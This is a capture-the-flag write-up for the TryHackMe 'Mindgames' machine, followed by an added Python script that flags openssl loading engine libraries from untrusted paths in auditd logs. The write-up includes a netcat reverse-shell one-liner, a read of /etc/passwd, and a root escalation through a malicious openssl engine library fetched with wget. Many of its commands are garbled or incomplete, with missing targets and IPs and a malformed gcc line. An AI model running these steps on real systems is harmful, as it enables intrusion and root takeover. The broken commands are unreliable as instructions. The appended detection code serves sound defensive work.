TryHackMe | Mindgames


First things first: we run a simple nmap scan to see which ports are open and which services are running on them.

nmap -sC -sV -O -oA simple_scan
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan


Open the website in a browser. On visiting the web page, the first thing I see is brainf*ck text.

f = open("/etc/passwd", "r")
import os
os.system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 7896 > /tmp/f')
python3 -c 'import pty;pty.spawn("/bin/bash")'
cat user.txt

Privilege Escalation

Now that we have a stable shell, let's proceed with privilege escalation. First, let's transfer a file to the target machine. To do this we first have to create a server to host the file; I am using the ‘SimpleHTTPServer’ module to create a server on our local machine, and wget on the target machine to download it. Give the file the appropriate privileges and run it.

python -m SimpleHTTPServer 8080
wget +x
#include <unistd.h>

static void init() {
    execl("/bin/sh", "sh", NULL);
}
gcc -fPIC -o openssl.o -c openssl.c
gcc -shared -o -lcrypto openssl.o
wget +x openssl.so
openssl req -engine ./
cat /root/root.txt
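
Seen from the detection side, the last step above runs `openssl req -engine ./` against a library in the working directory. The following is an added example, not part of the original write-up: it rebuilds argv from auditd EXECVE records and flags openssl invocations that load an engine file from outside trusted library directories. The function names, the trusted-directory list and the sample records are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumption: directories where legitimate engine libraries live on this host.
TRUSTED_ENGINE_DIRS = ("/usr/lib/", "/usr/lib64/", "/lib/")

ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')
ID_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")

def parse_execve(line):
    """Rebuild argv from one auditd EXECVE record; None for other record types."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for m in ARG_RE.finditer(line):
        quoted, hexed = m.group(2), m.group(3)
        # auditd hex-encodes arguments that contain spaces or special bytes
        value = quoted if quoted is not None else bytes.fromhex(hexed).decode("utf-8", "replace")
        args[int(m.group(1))] = value
    return [args[i] for i in sorted(args)]

def suspicious_engine(argv):
    """Return the engine path when openssl loads an engine file outside trusted dirs."""
    if not argv or posixpath.basename(argv[0]) != "openssl":
        return None
    for flag, value in zip(argv, argv[1:]):
        if flag != "-engine" or "/" not in value:
            continue  # a bare ID such as "pkcs11" is not a file path
        if not posixpath.normpath(value).startswith(TRUSTED_ENGINE_DIRS):
            return value
    return None

def scan(lines):
    """Return (audit event id, engine path) for every flagged EXECVE record."""
    hits = []
    for line in lines:
        engine = suspicious_engine(parse_execve(line))
        if engine:
            m = ID_RE.search(line)
            hits.append((m.group(1) if m else "?", engine))
    return hits

# Constructed sample records (not captured from the target machine).
SAMPLE = [
    'type=EXECVE msg=audit(1700000000.101:501): argc=4 a0="openssl" a1="req" a2="-engine" a3="./openssl.so"',
    'type=EXECVE msg=audit(1700000000.202:502): argc=4 a0="/usr/bin/openssl" a1="dgst" a2="-engine" a3="pkcs11"',
    'type=EXECVE msg=audit(1700000000.303:503): argc=3 a0="openssl" a1="version" a2="-a"',
    'type=EXECVE msg=audit(1700000000.404:504): argc=4 a0="openssl" a1="req" a2="-engine" a3=2F746D702F6120622E736F',
]

if __name__ == "__main__":
    for event_id, engine in scan(SAMPLE):
        print(f"event {event_id}: openssl loaded engine from {engine}")
```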


